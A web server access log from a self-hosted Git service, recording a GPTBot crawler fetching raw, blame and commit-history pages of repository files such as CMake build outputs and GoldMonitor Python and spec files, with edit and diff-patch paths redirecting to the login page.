git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 9780] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10269] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10270] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18342] [Gzip 8.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 10249] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15650] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11842] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:16:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/status.json" -[17/Feb/2026:17:16:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/status.json" -[17/Feb/2026:17:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11843] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12017] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17063] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:17:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:17:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:17:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 